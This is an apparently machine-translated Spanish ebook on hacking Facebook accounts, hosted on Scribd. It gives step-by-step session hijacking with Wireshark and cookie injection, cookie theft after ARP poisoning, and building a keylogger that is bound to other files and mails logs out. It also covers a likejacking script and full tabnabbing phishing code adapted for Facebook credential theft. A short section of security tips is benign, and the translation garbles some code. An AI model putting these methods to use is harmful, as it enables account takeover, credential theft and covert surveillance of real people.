0% encontró este documento útil (0 votos)
691 vistas88 páginas

Facebook Hacking - En.es

Este documento contiene una nota legal sobre el uso responsable de la información proporcionada y una breve biografía del autor, un adolescente de 13 años apasionado por la computación. Explica cómo llevar a cabo un ataque de secuestro de sesión de Facebook mediante el uso de una herramienta de captura de paquetes como Wireshark para interceptar la cookie de sesión de un usuario y hacerse pasar por él. También incluye una tabla de contenido con varios consejos y trucos para hackear cuentas de Facebook y usar la red social.

Cargado por

Estefano R LR
Derechos de autor
© © All Rights Reserved
Nos tomamos en serio los derechos de los contenidos. Si sospechas que se trata de tu contenido, reclámalo aquí.
Formatos disponibles
Descarga como PDF, TXT o lee en línea desde Scribd
0% encontró este documento útil (0 votos)
691 vistas88 páginas

Facebook Hacking - En.es

Este documento contiene una nota legal sobre el uso responsable de la información proporcionada y una breve biografía del autor, un adolescente de 13 años apasionado por la computación. Explica cómo llevar a cabo un ataque de secuestro de sesión de Facebook mediante el uso de una herramienta de captura de paquetes como Wireshark para interceptar la cookie de sesión de un usuario y hacerse pasar por él. También incluye una tabla de contenido con varios consejos y trucos para hackear cuentas de Facebook y usar la red social.

Cargado por

Estefano R LR
Derechos de autor
© © All Rights Reserved
Nos tomamos en serio los derechos de los contenidos. Si sospechas que se trata de tu contenido, reclámalo aquí.
Formatos disponibles
Descarga como PDF, TXT o lee en línea desde Scribd
Está en la página 1/ 88

Traducido del inglés al español - www.onlinedoctranslator.

com

1
2

Nota legal

Cualquier procedimiento o actividad relacionada con el material


contenido en este volumen es de su exclusiva responsabilidad. El mal
uso y maltrato de la información contenida en este libro puede dar
lugar a cargos ilegales en contra de las personas en cuestión. Los
autores y los analizadores de reseñas no serán responsables en caso
de que se presenten cargos ilegales contra cualquier persona por el
uso indebido de la información de este libro para infringir la ley. Este
libro contiene material y recursos que pueden ser potencialmente
destructivos o peligrosos. Si no comprende completamente algo de
este libro, no lo estudie.

Consulte las leyes y leyes de su estado/región/provincia/


zona/territorio o país antes de acceder, utilizar o utilizar de
cualquier otra forma estos recursos. Estos materiales y
recursos son solo para fines educativos y de investigación.
No intente violar la ley con nada incluido aquí. Si esta es tu
intención, vete ahora.
Ni el autor de este libro, ni los analizadores de reseñas, ni el editor, ni
nadie
otra persona afiliada de cualquier manera, va a admitir cualquier responsabilidad por
su
procedimientos, acciones o juicios.

Derechos de autorwww.cyber-worldd.blogspot.in
3

Sobre el Autor

Anurag Dwivedi es un fanático de las computadoras de 13 años. A


quien le gusta encontrar vulnerabilidades
Hacer Hacking , Programación , edición , cracking ,
web
diseñar y escribir libros
Quiere Ser Diseñador De Software..!!!!

Únete a su blog:

Experto en computacion

Únete a él en FB:

anurag dwivedi

Derechos de autorwww.cyber-worldd.blogspot.in
4

RECONOCIMIENTO
“Para cualquier trabajo exitoso, se debe agradecer a muchos”
Nadie camina solo y cuando uno está caminando en el viaje de la vida, comienza a
agradecer a aquellos que lo acompañaron, caminaron a su lado y lo ayudaron en el
camino.
A lo largo de los años, aquellos con los que me he encontrado y trabajado me han instado
continuamente a escribir un libro, compartir mis conocimientos y habilidades en papel y compartir
mis ideas junto con los secretos de mi enfoque continuo y positivo de la vida y toda esa vida. nos
lanza. Así que por fin, aquí está.
Entonces, tal vez este libro y sus páginas serán vistos como "gracias" a las decenas de miles
de ustedes que me han ayudado a hacer de mi vida lo que es hoy. El trabajo duro, el
conocimiento, la dedicación y la actitud positiva son necesarios para realizar cualquier tarea
con éxito, pero un ingrediente que también es muy importante es la cooperación.

y orientación de expertos y personas experimentadas.

Todas las palabras son un léxico inútil y sin sentido si no expreso mi sentido de respeto
por mis padres y mi hermana por sus sacrificios, bendiciones, oraciones, amor eterno,
dolor y fe en mí.

Expreso mi más sincero reconocimiento a mis padres, el Sr. Surendra Dwivedi y la Sra.
Manju Dwivedi. También agradezco a mi hermano Abhishek Dwivedi y a todos los
miembros de mi familia por su apoyo invaluable. finalmente a mis amigosdeepika
shukla, Shrey Trivedi,tanque de jigar,aakash kumarYUjjwal Gautama (Gillu)sin ustedes
amigos nunca llegaría a este puesto gracias amigo.
Para terminar, también te agradezco que estés leyendo este libro.

Derechos de autorwww.cyber-worldd.blogspot.in
5

Tabla de contenido

A. Hackeo de cuentas de Facebook

1. Ataque de secuestro de sesión


2. Seguridad de Facebook
3. Ataque de robo de cookies
4. Registrador de teclas

5. Robo de clics
6. Tomando pestañas

7. Herramienta de administración remota

8. Ataque de ingeniería social


9. Suplantación de identidad

10. Usando el ataque de 3 amigos

11. Envenenamiento por ARP

12. Descifrador de contraseñas FB


13. Hackear cuentas de FB usando Google Dork List
14. Hackeo de la página de fans de Facebook

15. Phising de escritorio

Derechos de autorwww.cyber-worldd.blogspot.in
6

B. Consejos/trucos de Facebook

1. Hackea el estado de FB de tus amigos


2. Actualizar el estado de FB con nombres falsos
3. UTILIZAR FB en lenguaje de hackers
4. Detenga las etiquetas de fotos no deseadas en la línea de tiempo

5. Cómo cambiar/actualizar el estado de alguien en Facebook


6. Rastrear a alguien en Facebook
7. Publicar estado en FB por cualquier dispositivo

8. Cómo publicar en todos los grupos de FB con un solo clic


9. Publicar estado en blanco y comentar en Facebook
10. Cómo mostrar quién está en línea en Facebook cuando estás en modo
sin conexión
11. Cómo deshabilitar la búsqueda pública de su perfil de FB
12. Cómo saber si alguien hackeó tu cuenta de Facebook
13. Cómo rastrear las actividades de FB
14. Cómo cambiar las actualizaciones de estado de FB

15. Cómo eliminar la cuenta de Facebook de tus amigos en 24 horas


16. Agregue todos los amigos de Facebook en grupos de FB con un solo clic
17. Convierta cualquier imagen en códigos de chat de Facebook
18. Cómo convertir una cuenta de FB en páginas de fans
19. Cómo crear una cuenta de FB con un solo nombre

Derechos de autorwww.cyber-worldd.blogspot.in
7

20. Insertar imagen de perfil en la cuenta de FB


21. Truco para editar la página de inicio de FB con JavaScript
22. Cambia tu tema de Facebook
23. Inicie sesión en sus demasiadas cuentas de FB en Google Chrome

Derechos de autorwww.cyber-worldd.blogspot.in
8

Derechos de autorwww.cyber-worldd.blogspot.in
9

Sección 1 - Secuestro de sesión: -

¿Qué es un ataque de secuestro de sesión?


El secuestro de sesión, también conocido como secuestro de sesión TCP, es un método para hacerse cargo de una sesión de usuario web

mediante la obtención subrepticia de la ID de sesión y haciéndose pasar por el usuario autorizado. Una vez que se ha accedido a la

identificación de la sesión del usuario (a través de la predicción de la sesión), el atacante puede hacerse pasar por ese usuario y hacer

cualquier cosa que el usuario esté autorizado a hacer en la red.

La ID de sesión normalmente se almacena dentro de una cookie o URL. Para la mayoría de las comunicaciones, los
procedimientos de autenticación se llevan a cabo en la configuración. El secuestro de sesiones se aprovecha de esa práctica
al entrometerse en tiempo real, durante una sesión. La intrusión puede o no ser detectable, según el nivel de conocimientos
técnicos del usuario y la naturaleza del ataque. Si un sitio web no responde de la manera normal o esperada a la entrada del
usuario o deja de responder por un motivo desconocido, el secuestro de sesión es una posible causa.

¿Explicación paso a paso de cómo llevar a cabo este


ataque?
En primer lugar, deberá conectarse a una conexión inalámbrica no segura que otros estén utilizando. Luego comenzamos a

capturar paquetes transferidos a través de esta red. Tenga en cuenta que su adaptador inalámbrico debe admitir el modo de

monitor para escanear todos los paquetes transferidos a través de una red. puede verificar las especificaciones de su tarjeta wi-fi

para ver si es compatible con el modo de monitor.

Entonces necesitaríamos usar una herramienta de rastreo de red para rastrear los paquetes transferidos a través de la red.
En este caso, estoy usando una herramienta llamada Wireshark (Descargar desde aquí ). Dentro de wireshark, hay un menú
llamado "Capturar"; En el menú de captura, seleccione las interfaces de ese menú y aparecerá una lista de sus interfaces..

Derechos de autorwww.cyber-worldd.blogspot.in
10

A continuación, seleccione Iniciar junto a la interfaz en la que ha habilitado el modo de monitor. la mayoría de las
veces es la interfaz la que captura la mayoría de los paquetes. En mi caso, la interfaz de Microsoft captura la mayoría
de los paquetes, por lo que seleccionaré comenzar a capturar con la interfaz de Microsoft. Dejaría que Wireshark
capturara paquetes durante un par de segundos, dependiendo de la cantidad de personas que actualmente usan la
red. Digamos 30 segundos si 10 personas están usando la red actualmente, o 30 minutos si apenas hay actividad en
la red. Durante la captura, Wireshark se verá así.

Después de capturar una cierta cantidad de paquetes, o ejecutar la captura durante un cierto período de tiempo, deténgala
haciendo clic en el botón detener la captura actual.

Después de detener la captura, deberá buscar la cookie de sesión de Facebook del usuario que, con suerte, se transfirió
en uno de los paquetes capturados. para encontrar esta cookie, use la búsqueda de wireshark que se puede encontrar
presionando "ctrl + f" en su teclado. En esta interfaz de búsqueda, seleccione Buscar: Por "Cadena"; Buscar en: "Detalles
del paquete". y filtrar por la cadena "Cookie".

Derechos de autorwww.cyber-worldd.blogspot.in
11

Cuando presiona buscar, si hay una cookie, esta búsqueda la encontrará, si no se capturó ninguna cookie, tendrá
que volver al paso 2. Sin embargo, si tiene suerte y capturamos algunas cookies, cuando busque cookie, su interfaz
se verá así en el diagrama a continuación. Notará que la cookie junto a la flecha contiene muchos datos, para
obtener los datos. lo siguiente que debe hacer es hacer clic con el botón derecho en la cookie y hacer clic en copiar-
> descripción.

Después de copiar la descripción, péguela en un archivo de texto y separe cada variable en una nueva línea (tenga en cuenta
que el final de cada variable se representa con un punto y coma, por ejemplo, c_user=100002316516702;). Después de
investigar y experimentar un poco, descubrí que Facebook autenticó la sesión del usuario mediante 2 cookies llamadas
c_user y xs. Por lo tanto, solo necesitará los valores de estas cookies y luego deberá inyectarlas en su navegador. Antes de
inyectar las cookies, así es como se veía mi página de Facebook:

Derechos de autorwww.cyber-worldd.blogspot.in
12

Lo siguiente que debe hacer es inyectar esta información como su propia cookie. así que primero necesitaría instalar una

extensión de administrador de cookies para su navegador, estoy usando el Administrador de cookies de Firefox. Después de

instalar esta extensión, la encontrará en Herramientas->administrador de cookies. La interfaz para el administrador de cookies se

ve así:

Lo primero que tendríamos que hacer es borrar todas las cookies, así que borre todas las cookies que tiene actualmente.
Luego seleccione el enlace "Agregar cookie" para agregar una nueva cookie. La primera cookie que agregará es la cookie
c_user que tendrá la siguiente información: Dominio: ".facebook.com", nombre: "c_user", valor: "el valor que copió
anteriormente del escaneo de wireshark" y la ruta: "/"; deje los valores predeterminados de isSecure y Expires On:

Derechos de autorwww.cyber-worldd.blogspot.in
13

Lo siguiente que debe hacer es presionar el botón "Agregar" y la cookie se guarda. Repita los mismos pasos para
agregar la cookie xs con toda la misma información, excepto el valor, que sería el valor xs que tiene.

Después de agregar estas 2 cookies, simplemente vaya a facebook.com, actualice la página y... ¡¡Boom!! verá que ha
iniciado sesión como ese usuario cuya información de cookies robó. Aquí está mi página de Facebook después de que
inyecté esas cookies:

Derechos de autorwww.cyber-worldd.blogspot.in
14

Sección 2 - Seguridad de Facebook: -

#1– ¿Habilitar HTTPS?


Cuando marque la URL para Facebook o cualquiera de sus otras redes sociales, asegúrese de usar HTTPS en
lugar de HTTP. Esto cifra sus comunicaciones.

De hecho, tendrá que deshabilitar temporalmente esta función cada vez que dé acceso a una nueva
aplicación. Eso solo debería darle la confianza de que ha logrado un mayor nivel de protección.

# 2– Deshabilitar el chat en línea?


Todos hemos sido testigos de estafas en Facebook, siendo la más común el infame mensaje de chat...
"Estoy en el Reino Unido y me han asaltado. Envíe dinero para que pueda volver a casa".

Si bien no tengo una base técnica para esto, es lógico que los piratas informáticos ingresen a través del servicio de chat.
Cada vez que he notado comentarios falsos supuestamente hechos por mí a mis amigos de Facebook, es porque
anteriormente había usado el chat en línea.

Para deshabilitar el chat, simplemente haga clic en la pequeña rueda en la barra lateral derecha y desconéctese. Luego cierre la ventana y

asegúrese de que se registre como chat fuera de línea.

Derechos de autorwww.cyber-worldd.blogspot.in
15

# 3 – Permisos de revisión otorgados a aplicaciones de terceros?

Cuando otorga acceso a las aplicaciones de Facebook, esos permisos duran mucho después de que deja de usarlos. Ir a este enlace

pararevisa los permisos de tu aplicación de Facebook –y deshabilite cualquiera que ya no esté usando.

¡Probablemente se sorprenderá de la larga lista de permisos que ha otorgado anteriormente!

#4 – Activa las notificaciones de mensajes de texto?

Facebook le permite recibir notificaciones de texto cada vez que se accede a su cuenta desde un dispositivo
que no sea su computadora principal o dispositivo móvil.

Simplemente vaya a Configuración de la cuenta y luego a Configuración de seguridad para configurar las notificaciones adecuadas para

su dispositivo móvil.

Primero vaya a aprobaciones de inicio de sesión y luego a notificaciones de inicio de sesión.

Derechos de autorwww.cyber-worldd.blogspot.in
dieciséis

Solo puede elegir notificaciones por correo electrónico o mensajes de texto. Al elegir las notificaciones de texto, no solo

recibe un aviso inmediato, sino que también activa tanto su dispositivo móvil como su computadora principal como puntos

de acceso aprobados.

# 5 – Mantener direcciones de correo electrónico públicas y privadas?

La dirección de correo electrónico que usa para Facebook debe ser distinta de la que usa donde la seguridad es más
crítica, como su cuenta bancaria en línea o Paypal.

Si su cuenta de Facebook es pirateada, es vergonzoso. Si ese es el mismo correo electrónico utilizado en sus cuentas
más seguras, ahora esa vulnerabilidad podría ser costosa.

Obviamente, si es selectivo con sus direcciones de correo electrónico y cambia periódicamente sus contraseñas, minimiza
sus posibilidades de ser pirateado.

¿Sabías que cualquiera puede buscar en Facebook una dirección de correo electrónico? Por ejemplo, si está buscando un
nombre común como John Smith, solo necesita buscar con su correo electrónico para encontrar el correcto.

Esto es útil para encontrar a tus amigos en Facebook, pero también es útil para los piratas informáticos. La apuesta segura es usar

contraseñas distintas para sus direcciones de correo electrónico públicas y privadas.

Hay aún más formas de proteger su Facebook y otras cuentas en línea, pero estas 5 son
las más esenciales y son específicas de Facebook, que parece ser el sitio más vulnerable.

Derechos de autorwww.cyber-worldd.blogspot.in
17

Sección 3 - Ataque de robo de cookies: -

¿Qué son las cookies? ¿Y cuál es el uso de robar cookies?


Las cookies son pequeños archivos que los sitios web almacenan en la computadora de los usuarios cuando un usuario los visita.

El servidor web utiliza las cookies almacenadas para identificar y autenticar al usuario. Por ejemplo, cuando un usuario inicia

sesión en Facebook, se genera una cadena única y una copia de la misma se guarda en el servidor y otra se guarda en el

navegador del usuario como cookies. Ambos coinciden cada vez que el usuario hace algo en su cuenta.

Entonces, si robamos la cookie de la víctima y la inyectamos en nuestro navegador, podremos imitar la identidad de la víctima en

el servidor web y, por lo tanto, podremos iniciar sesión en su cuenta. Esto se llama elevación lateral. Lo mejor de esto es que no

necesitamos la identificación o la contraseña de las víctimas, todo lo que necesitamos es la cookie de las víctimas..

¿Hackear Facebook/Twitter robando cookies?


1.Ettercap oCaín y capaz por ARP envenenando a la víctima
2.Tiburón de alambre por oler y robar galletas
3.Firefox navegador yComplemento de registrador de cookies por inyectar las cookies robadas en nuestro navegador

1. Primero ARP envenena a la víctima. Para esto, puede consultar mis artículos anteriores sobre cómo ARP envenena la

computadora de la víctima usandoCaín y capaz oEttercap

2. Después del envenenamiento por ARP, abra Wire Shark, haga clic en el botón de captura de la barra de menú, luego seleccione la interfaz

. Ahora seleccione su interfaz (generalmente eth0) y finalmente haga clic en Iniciar captura.

3. Ahora puede ver los paquetes que se capturan, espere un momento hasta que la víctima inicie sesión en su
cuenta (Facebook/twitter),

4. Mientras busca la dirección IP de Facebook, para esto puede abrir CMD (símbolo del sistema) e ingresar .Ping
Facebook.com para encontrar su dirección IP.

5. Ahora filtre los paquetes ingresando la dirección IP (Facebook) en la barra de filtro y haga clic en aplicar

6.ahora localizaHTTP Obtener /home.phpy copie todos los nombres y valores de las cookies en un bloc de notas.

7.Ahora abre Firefox y abreañadir y editar cookies,que descargamos anteriormente, agregue todos los valores de las
cookies y guárdelos.

Derechos de autorwww.cyber-worldd.blogspot.in
18

8.Ahora abra Facebook en una nueva pestaña, iniciará sesión en la cuenta de la víctima.

chris defaulter san valentin ...... ha pirateado la cuenta de Facebook de la víctima mediante el robo de cookies, también puede
seguir los mismos pasos para piratear cuentas de Twitter

Derechos de autorwww.cyber-worldd.blogspot.in
19

Sección 4 - Registrador de teclas: -

¿Qué son los registradores de teclas?


Usando la utilidad de registro de teclas, podrá establecer un control total sobre su computadora. También descubrirá qué estaba

pasando en su computadora en su ausencia: qué se ejecutó y escribió, etc., que actúan como el mejor software de protección de

Internet para niños. Usando el programa de registro de teclas constantemente, puede restaurar el texto escrito anteriormente en

caso de que lo haya perdido. El software registrador de pulsaciones de teclas funciona en modo oculto e invisible en el sistema

operativo Windows, incluido Windows 7/VISTA/XP/Server 2008/NT/98, etc.

Comencemos la guía: Cómo usarlo. ?


1) primero debe descargar esta aplicación, puede descargarla desde su sitio webDescargar , pero
actualmente está en mantenimiento ..

Descarga aquí -Haga click aquí para descargar

2) Solo doy información sobre Neptune 1.4, pero también puedes usar 1.45, es una versión actualizadai en eso también se envía una

captura de pantalla.

Después de la descarga, extraiga el archivo .rar, abra la carpeta del proyecto, haga clic en el proyecto Neptune v1.4. Ahora aparecerá una

ventana como la que se muestra a continuación. Haga lo que se menciona en la captura de pantalla.

Nota: estoy dando tut para obtener registros por correo (gmail aquí), pero también puede usar otro, o también puede usar el servidor

ftp.

Derechos de autorwww.cyber-worldd.blogspot.in
20

3) Ahora vaya a la pestaña 'Creación de servidor' y presione 'Generar nuevo servidor' en 'creación de servidor', dé el
nombre de su registrador de teclas y eso es todo... ya está :)

4) Hágalo autodestructivo: en la pestaña Opciones adicionales, puede marcar 'autodestrucción en', si desea
que se elimine después de una fecha en particular.

5) Agregar ícono: también puede agregar cualquier ícono al archivo final del registrador de teclas, para eso, vaya a la pestaña

'Creación del servidor' y seleccione 'Usar archivoi con' en 'configuración del servidor' y seleccione cualquier archivo de icono.

6) Vinculación: también puede vincularlo con cualquier otro archivo, para eso presione el botón del archivador, se abrirá una

ventana (como se muestra en la captura de pantalla), luego haga clic con el botón derecho y seleccione 'agregar archivo' y luego

seleccione cualquier cosa, por ej. cualquier software, película, video, canción, etc. con el que quieras vincularlo. 5.1) Después de

seleccionar el archivo de enlace, no cierre esta ventana y vaya al paso 3.

7) Capturas de pantalla: (solo avai lable en naptune 1.45) Vaya a Opciones adicionales, marque 'enviar capturas de pantalla' en
'Capturas de pantalla'

Derechos de autorwww.cyber-worldd.blogspot.in
21

Sección 5 – Clickjacking:-

¿Qué es el secuestro de clics?


El secuestro de clics es una técnica utilizada por piratas informáticos o spammers para engañar
o engañar a los usuarios para que hagan clic en enlaces o botones que están ocultos a la vista
normal (por lo general, el color de los enlaces es el mismo que el fondo de la página). El
secuestro de clics es posible debido a una debilidad de seguridad en los navegadores web que
permite que las páginas web se superpongan y se oculten de la vista general. En esta situación,
lo que sucede es que cree que está haciendo clic en un botón o enlace estándar, como el botón
REPRODUCIR o el botón de descarga en un video o algo así, pero en realidad está haciendo clic
en un enlace oculto. Como no puede ver el enlace oculto del secuestrador de clics, no tiene
idea de lo que realmente está haciendo. Podrías estar descargando malware o haciendo
pública toda tu información de Facebook sin darte cuenta.

Hay varios tipos de secuestro de clics, pero el más común es ocultar un botón ME GUSTA debajo de un botón ficticio o falso.
Esta técnica se llama Likejacking. Un estafador o un pirata informático puede engañarlo diciendo que le gusta un producto
que nunca ha escuchado. A primera vista, likejacking suena más molesto que dañino, pero eso no siempre es cierto. Si te
estafan por gustarte Mark Zukenberg, es poco probable que el mundo se acabe. Pero es posible que esté ayudando a
propagar spam o posiblemente enviando amigos a algún lugar que contenga malware.

Derechos de autorwww.cyber-worldd.blogspot.in
22

HCómo funciona?
El botón Me gusta se oculta y se mueve junto con el mouse. Entonces, donde sea que el usuario haga clic, se hace clic en el botón

Me gusta y le gusta su página de fans. Primero descargue el JavaScript desde el enlace de descarga a continuación.

mediafuego

Después de descargar el script, extraiga todos los archivos. Ahora modifique config.js y siga las instrucciones a
continuación.

1. Modifique el archivo config.js en la carpeta "src" para cambiar la URL de la página de fans y otras cosas. Los

comentarios se proporcionan junto a ellos para ayudarlo a saber qué hacen exactamente.

2. Hay una función de tiempo de espera después de la cual el botón Me gusta ya no estará presente (mover). "tiempo" si se

establece en 0 hará que permanezca para siempre (lo que generalmente no se prefiere).

3. Establezca la opacidad en '0' antes de ejecutar el script. De lo contrario, el botón Me gusta no será invisible.

¿Establecer correctamente la var en el archivo si está desordenado?


Después de modificar el script config.js, cargue estos scripts en el sitio web de alojamiento de
javascript. Prefierotujavascripttambién puede subir a algún otro sitio web.

Cómo ejecutar el script?


1. Agregue config.js justo encima de la etiqueta principal en sus páginas

----------------------------------------------------------------------------------------------------

- - - - - - - - - - - - - - - - - - - - <script language="javascript" src="src/config.js"> </script>

------------------------------------------------------------------------------------------------------------------------

2. Agregue like.js después de la etiqueta del cuerpo en sus páginas

------------------------------------------------------------------------------------------------------------

- - - - - - - - - - - - <script language="javascript" src="src/like.js"> </script>

------------------------------------------------------------------------------------------------------------------------

Elimine el enlace src con su enlace cargado.

5. Eso es todo. El guión está listo para funcionar.

Derechos de autorwww.cyber-worldd.blogspot.in
23

Sección 6 – Tabnapping:-

Hola amigos, soy Chris Defaulter Valentine. Ingeniero de sistemas certificado por Microsoft

(MCSE), pirata informático IIT de comercializador de Internet Tengo 10 años de experiencia eludiendo

Medidas de seguridad de la información y puedo informar que comprometí todo con éxito

Sistemas a los que me dirigí para acceso no autorizado, excepto uno. tengo dos años'

Experiencia como investigador privado y mis responsabilidades incluían encontrar personas

y su dinero, principalmente utilizando técnicas de ingeniería social. hoy voy a


Cómo hackear correos electrónicos, sitios web de redes sociales y otros sitios web que implican inicio de sesión

información. La técnica que les voy a enseñar hoy es Tabnabbing Avanzado.


Ya he explicado que es el tabnabbing basico hoy ampliaremos nuestros conocimientos

base, explicaré las cosas con un ejemplo práctico. Entonces aprendamos..

1. Un hacker dice (yo Chris) personaliza la página web actual editando/agregando algunos nuevos

parámetros y variables. (Consulte el código a continuación para obtener más detalles)

2.Envío una copia de esta página web a la víctima cuya cuenta o lo que sea que quiero hackear.

3.Ahora, cuando el usuario abra ese enlace, se abrirá una página web similar a esta en iframe

que contiene la página real con la ayuda de java script.

Derechos de autorwww.cyber-worldd.blogspot.in
24

4.El usuario podrá navegar por el sitio web como el original, como avanzar
hacia atrás y navegar por las páginas.

5.Ahora, si la víctima dejó abierta la nueva página web durante un cierto período de tiempo, la pestaña o el
sitio web cambiará a Phish Page o simplemente se llamará página falsa que se verá absolutamente similar a
la original.

6.Ahora, cuando el usuario ingresa sus credenciales (nombre de usuario/contraseña), ingresa eso en la
página falsa y queda atrapado en nuestra red que he establecido para piratearlo.

Aquí termina el escenario de ataque para tabnabbing avanzado.

Antes de codificar Part, primero compartamos consejos para protegerse de este tipo de
ataque porque es completamente indetectable y nunca podrá saber que su cuenta fue
pirateada o comprometida. Entonces, primero aprenda cómo protegerse de Advanced
Tabnabbing.

Siga las siguientes medidas para protegerse del Tabnabbing:

1.Utilice siempre complementos de secuencias de comandos anti-java en su navegador web que detengan la
ejecución de javascripts maliciosos. Por ejemplo: Noscript para Firefox, etc.

2.Si nota que suceden cosas sospechosas, primero verifique la URL en la barra de
direcciones.

3.Si recibe algún enlace en el correo electrónico o mensaje de chat, nunca haga clic directamente en él. Siempre

prefiere escribirlo manualmente en la barra de direcciones para abrirlo, esto puede costarle algo de manual

trabajo o tiempo, pero lo protegerá de las URL maliciosas ocultas.

4.La mejor manera es usar cualquier buena barra de herramientas de seguridad web como la barra de herramientas web AVG o Norton

barra de herramientas de seguridad web para protegerse de tales ataques.

5.Si usa ideveloper o Firebug, verifique los encabezados usted mismo si encuentra

algo sospechoso

Derechos de autorwww.cyber-worldd.blogspot.in
25

Eso termina nuestra parte de seguridad. Aquí termina mi deber ético de hacker de notificar a todos los usuarios sobre

el ataque. Ahora empecemos con lo real..

Nota:Aza Raskin fue la primera persona en proponer la técnica del tabnabbing y todavía

seguimos el mismo concepto. Simplemente extenderé su concepto al siguiente nivel.

Primer código de muestra para hacer tabnabbing con la ayuda de iframes:

<!--
Título: Tabnabbing avanzado usando IFRAMES y Java script
Autor: Chris Defaulter Valentine (Anónimo)
-->

<html>
<título><título></título></título>
<tipo de estilo="texto/css">
html {desbordamiento: automático;}

html, cuerpo, div, iframe {margen: 0px; relleno: 0px; altura:


100%; borde: ninguno;}
iframe {pantalla: bloque; ancho: 100%; borde: ninguno; desbordamiento-y:
auto; desbordamiento-x: oculto;}
</estilo>
<cuerpo>

Derechos de autorwww.cyber-worldd.blogspot.in
26

<script tipo="texto/javascript">
//---------Establecer opciones de secuencia de comandos--------------

var REAL_PAGE_URL = "http://www.google.com/"; //Este es el


Página "real" que se muestra cuando el usuario ve esta página por primera vez
var REAL_PAGE_TITLE = "Google"; //Esto establece el título del
"Página real"
var FAKE_PAGE_URL = "http://www.hackingloops.com"; //Establece esto en
la url de la pagina falsa
var FAKE_PAGE_TITLE = "HackingLoops| Hackers de próxima generación
Portal"; //Esto establece el título de la página falsa
var REAL_FAVICON = "http://www.google.com/favicon.ico"; //Este
establece el favicon. No cambiará ni borrará el "Real"
icono de favoritos en IE.

var FAKE_FAVICON = "http://www.hackingloops.com/favicon.ico";


// Establezca el favicon falso.
var TIME_TO_SWITCH_IE = "4000"; //Tiempo antes de cambiar a Internet
Explorer (después de que la pestaña cambie a una pestaña falsa).

var TIME_TO_SWITCH_OTHERS = "10000"; //Espera esto mucho antes


cambiar
//---------------Opciones finales-----------------
var TEMPORIZADOR = nulo;

var CONMUTADO = "falso";

//EncontrarTipo de navegador

var NAVEGADOR_TIPO = "";


if(/MSIE (\d\.\d+);/.test(navigator.userAgent)){
NAVEGADOR_TIPO = "Internet Explorer";
Derechos de autorwww.cyber-worldd.blogspot.in
27

}
//Establecer REAL_PAGE_TITLE

document.title=REAL_PAGE_TITLE;

//Establecer FAVICON

si(REAL_FAVICON){
var enlace = documento.createElement('enlace');
link.type = 'imagen/icono-x';
link.rel = 'icono de acceso directo';
enlace.href = REAL_FAVICON;
document.getElementsByTagName('head')[0].appendChild(enlace);
}

//Crear nuestro iframe (tabnab)


var el_tabnab = document.createElement("iframe");
el_tabnab.id="tabnab";
el_tabnab.name="tabnab";
documento.cuerpo.appendChild(el_tabnab);
el_tabnab.setAttribute('src', REAL_PAGE_URL);

//Enfóquese en el iframe (en caso de que el usuario no haga clic en


eso)
el_tabnab.focus();

// ¡Espera para atrapar la pestaña!

if(BROWSER_TYPE=="Internet Explorer"){ //Para desenfocar la pestaña


cambios en el navegador web de Internet
Derechos de autorwww.cyber-worldd.blogspot.in
28

el_tabnab.onblur = función(){
TIMER = setTimeout(TabNabIt, TIME_TO_SWITCH_IE);
}
el_tabnab.onfocus= función(){
if(TEMPORIZADOR) clearTimeout(TEMPORIZADOR);

}
} más {
setTimeout(TabNabIt, TIME_TO_SWITCH_OTHERS);
}

función TabNabIt(){
si (CONMUTADO == "falso"){
//Redirige el iframe a FAKE_PAGE_URL
el_tabnab.src=URL_PÁGINA_FALSA;
//Cambiar título a FAKE_PAGE_TITLE y favicon a
FAKE_PAGE_FAVICON
if(FALSO_PÁGINA_TÍTULO) documento.título = FALSO_PÁGINA_TÍTULO;

//Cambiar el favicon -- Esto no parece funcionar en IE


if(NAVEGADOR_TIPO!= "Internet Explorer"){
var enlaces =
documento.getElementsByTagName("cabeza")[0].getElementsByTagName("l
tinta");
for (var i=0; i<enlaces.longitud; i++) {
var looplink = enlaces[i];
if (looplink.type=="imagen/icono-x" && looplink.rel=="acceso directo
icono") {
Derechos de autorwww.cyber-worldd.blogspot.in
29

document.getElementsByTagName("head")[0].removeChild(bucleenlace);
}
}
var enlace = documento.createElement("enlace");
link.type = "imagen/icono-x";
link.rel = "icono de acceso directo";
enlace.href = FALSO_FAVICON;
document.getElementsByTagName("head")[0].appendChild(enlace);
}
}
}
</script>

</cuerpo>

</html>

Ahora, lo que necesita reemplazar en este código para que funcione, diga para Facebook:

1.REAL_PAGE_URL: www.facebook.com
2.REAL_PAGE_TITLE:Bienvenido a Facebook -Inicie sesión, regístrese o aprenda más
3.FAKE_PAGE_URL: URL de su página falsa o página de suplantación de identidad
4.FAKE_PAGE_TITLE: Bienvenido a Facebook: inicie sesión, regístrese u obtenga más información
5.REAL_FAVICON: www.facebook.com/favicon.ico
6.FAKE_FAVICON: URL de su página falsa/favicon.ico (Nota:Es mejor subir el favicon
de facebook, lo hará más indetectable)
7.BROWSER_TYPE: encuentre qué navegador web usa normalmente el usuario y ponga ese nombre aquí
entre comillas.
8.TIME_TO_SWITCH_IE: coloque el valor numérico (tiempo) después de que desee cambiar de pestaña.
9.TIME_TO_SWITCH_OTHERS: tiempo después del cual desea volver a la página 'real'
original o alguna otra página.

Derechos de autorwww.cyber-worldd.blogspot.in
30

Ahora, como expliqué anteriormente, puede usar esta técnica para piratear cualquier cosa, como cuentas de
correo electrónico, Facebook o cualquier otrositio web de redes sociales.Lo que debe hacer es editar los 9
campos mencionados anteriormente, guardarlos como anyname.htm y cargarlos de forma gratuita.sitio web
de alojamiento webjunto con el archivo favicon y envíe el enlace al usuario en forma de correo electrónico o
mensaje de chat (oculto usando la palabra clave href en html o falsificado usando alguna otra técnica).

Derechos de autorwww.cyber-worldd.blogspot.in
31

Sección 7 - Herramienta de administración remota: -

Una herramienta de administración remota (o RAT) es un programa que permite a ciertas personas conectarse y
administrar computadoras remotas en Internet o en una red local. Una herramienta de administración remota se
basa en la tecnología de servidor y cliente. La parte del servidor se ejecuta en una computadora controlada y recibe
comandos del cliente, que está instalado en otro host remoto. Una herramienta de administración remota funciona
en segundo plano y se oculta del usuario. La persona que lo controla puede monitorear la actividad del usuario,
administrar archivos, instalar software adicional, controlar todo el sistema, incluida cualquier aplicación presente o
dispositivo de hardware, modificar la configuración esencial del sistema, apagar o reiniciar una computadora.

Continuarhttp://www.no-ip.com/ , Cree su Cuenta y haga clic en "Descargar". Ahora

haga clic en "Windows

